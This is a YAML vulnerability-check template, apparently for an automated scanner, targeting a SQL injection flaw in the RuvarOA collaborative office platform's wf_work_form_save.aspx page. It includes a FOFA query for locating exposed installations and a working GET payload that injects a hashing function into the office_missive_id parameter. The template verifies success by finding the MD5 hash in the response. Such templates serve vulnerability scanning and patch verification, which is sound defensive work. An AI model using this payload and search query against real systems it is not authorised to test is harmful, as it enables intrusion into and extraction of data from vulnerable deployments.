product: RuvarOA
vName: RuvarOA wf_work_form_save.aspx存在SQL注入漏洞
type: SQL注入
vID: [ ]
level: 3
vDesc: RuvarOA协同办公平台/WorkFlow/wf_work_form_save.aspx存在SQL注入
version: ''
note: ''
search:
  FOFA: app="RUVAR-OA"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /WorkFlow/wf_work_form_save.aspx?office_missive_id=sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456'))
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: 'and'